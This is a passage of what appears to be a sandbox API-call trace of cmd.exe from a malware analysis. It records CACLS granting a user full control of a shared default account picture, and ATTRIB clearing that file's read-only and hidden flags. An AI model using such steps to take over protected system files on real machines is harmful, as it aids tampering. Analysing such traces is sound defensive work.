lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0179.955] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.955] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.955] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.955] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0179.955] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0179.956] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0179.956] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0179.956] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0179.956] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0179.956] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0179.956] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0179.956] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0179.956] GetEnvironmentStringsW () returned 0x362458* [0179.956] FreeEnvironmentStringsW (penv=0x362458) returned 1 [0179.956] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.956] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.956] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0179.956] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0179.956] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0179.956] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0179.956] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0179.956] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0179.956] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0179.956] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0179.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f610 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.956] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f610, lpFilePart=0x26f60c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f60c*="Desktop") returned 0x18 [0179.956] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0179.956] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f38c | out: lpFindFileData=0x26f38c) returned 0x360ae8 [0179.957] FindClose (in: hFindFile=0x360ae8 | out: hFindFile=0x360ae8) returned 1 [0179.957] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0179.957] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0179.957] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0179.957] GetEnvironmentStringsW () returned 0x360308* [0179.957] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.957] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0179.958] GetConsoleOutputCP () returned 0x1b5 [0179.958] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.958] GetUserDefaultLCID () returned 0x409 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f750, cchData=128 | out: lpLCData="0") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f750, cchData=128 | out: lpLCData="0") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f750, cchData=128 | out: lpLCData="1") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0179.959] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0179.959] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0179.960] GetConsoleTitleW (in: lpConsoleTitle=0x3509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.960] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0179.960] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0179.961] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0179.961] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0179.962] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0179.962] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0179.962] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0179.962] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0179.962] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0179.962] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0179.962] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0179.962] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0179.965] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0179.965] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0179.965] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0179.965] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0179.965] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0179.965] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0179.965] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0179.967] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.967] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0179.967] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0179.967] _wcsicmp (_String1="CACLS", 
_String2="DEL") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0179.968] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0179.968] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0179.968] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0179.968] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0179.968] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0179.968] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0179.968] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0179.968] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0179.968] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0179.968] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0179.968] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0179.968] _wcsicmp (_String1="CACLS", 
_String2="START") returned -16 [0179.968] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0179.968] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0179.968] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0179.968] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0179.968] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0179.968] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0179.969] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0179.969] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0179.969] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0179.969] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0179.969] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0179.969] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0179.969] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0179.969] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0179.969] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0179.969] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0179.969] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0179.969] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0179.969] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0179.969] _wcsicmp (_String1="CACLS", 
_String2="RMDIR") returned -15 [0179.969] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0179.969] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0179.969] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0179.969] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0179.969] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0179.969] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0179.969] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0179.969] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0179.970] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0179.970] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0179.970] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0179.970] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0179.970] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0179.970] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0179.970] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0179.970] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0179.970] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0179.970] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0179.970] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0179.970] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0179.970] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0179.970] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0179.970] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0179.970] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0179.970] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0179.970] SetErrorMode (uMode=0x0) returned 0x0 [0179.970] SetErrorMode (uMode=0x1) 
returned 0x0 [0179.971] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x361e98, lpFilePart=0x26ef04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ef04*="Desktop") returned 0x18 [0179.971] SetErrorMode (uMode=0x0) returned 0x1 [0179.971] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.971] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.976] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.976] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x362180 [0179.977] FindClose (in: hFindFile=0x362180 | out: hFindFile=0x362180) returned 1 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0179.977] GetLastError () returned 0x2 [0179.977] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ec80, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x362180 [0179.977] FindClose (in: hFindFile=0x362180 | out: hFindFile=0x362180) returned 1 [0179.977] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.977] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.977] GetConsoleTitleW (in: lpConsoleTitle=0x26f178, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.978] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f0c8 | out: lpAttributeList=0x26f000, lpSize=0x26f0c8) returned 1 [0179.978] UpdateProcThreadAttribute (in: lpAttributeList=0x26f000, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f0c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f000, lpPreviousValue=0x0) returned 1 [0179.978] GetStartupInfoW (in: lpStartupInfo=0x26efbc | out: lpStartupInfo=0x26efbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0179.978] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.979] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f05c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, 
dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0a8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x26f0a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbd0, dwThreadId=0x678)) returned 1 [0179.981] CloseHandle (hObject=0x4c) returned 1 [0179.981] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.981] GetEnvironmentStringsW () returned 0x360308* [0179.982] FreeEnvironmentStringsW (penv=0x360308) returned 1 [0179.982] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0180.019] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ef9c | out: lpExitCode=0x26ef9c*=0x0) returned 1 [0180.019] CloseHandle (hObject=0x50) returned 1 [0180.019] _vsnwprintf (in: _Buffer=0x26f0e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26efa8 | out: _Buffer="00000000") returned 8 [0180.019] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.019] GetEnvironmentStringsW () returned 0x362410* [0180.019] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.019] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.019] GetEnvironmentStringsW () returned 0x362410* [0180.019] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.019] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f000 | out: lpAttributeList=0x26f000) [0180.019] GetConsoleTitleW (in: lpConsoleTitle=0x26f3e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.020] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0180.020] 
NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.020] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0180.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.020] GetLastError () returned 0x2 [0180.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.020] GetLastError () returned 0x2 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x35e4d8 [0180.021] FindClose (in: hFindFile=0x35e4d8 | out: hFindFile=0x35e4d8) returned 1 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0xffffffff [0180.021] GetLastError () returned 0x2 [0180.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ec80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ec80) returned 0x35e4d8 [0180.021] FindClose (in: hFindFile=0x35e4d8 | out: hFindFile=0x35e4d8) returned 1 [0180.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.021] GetConsoleTitleW (in: lpConsoleTitle=0x26f178, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0180.021] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x26f000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f0c8 | out: lpAttributeList=0x26f000, lpSize=0x26f0c8) returned 1 [0180.021] UpdateProcThreadAttribute (in: lpAttributeList=0x26f000, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f0c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f000, lpPreviousValue=0x0) returned 1 [0180.021] GetStartupInfoW (in: lpStartupInfo=0x26efbc | out: lpStartupInfo=0x26efbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0180.022] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.022] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f05c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f0a8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"", lpProcessInformation=0x26f0a8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xcbc, dwThreadId=0xbb4)) returned 1 [0180.023] CloseHandle (hObject=0x50) 
returned 1 [0180.023] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.023] GetEnvironmentStringsW () returned 0x362410* [0180.023] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.023] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0180.059] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x26ef9c | out: lpExitCode=0x26ef9c*=0x0) returned 1 [0180.059] CloseHandle (hObject=0x4c) returned 1 [0180.059] _vsnwprintf (in: _Buffer=0x26f0e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x26efa8 | out: _Buffer="00000000") returned 8 [0180.059] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.059] GetEnvironmentStringsW () returned 0x362410* [0180.060] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.060] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.060] GetEnvironmentStringsW () returned 0x362410* [0180.060] FreeEnvironmentStringsW (penv=0x362410) returned 1 [0180.060] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f000 | out: lpAttributeList=0x26f000) [0180.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.060] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.060] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.060] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.060] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.060] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.061] SetConsoleInputExeNameW () returned 0x1 [0180.061] GetConsoleOutputCP () returned 0x1b5 [0180.061] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.061] exit (_Code=0) Process: id = "332" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ee0" os_pid = "0xbd0" os_integrity_level = "0x3000" 
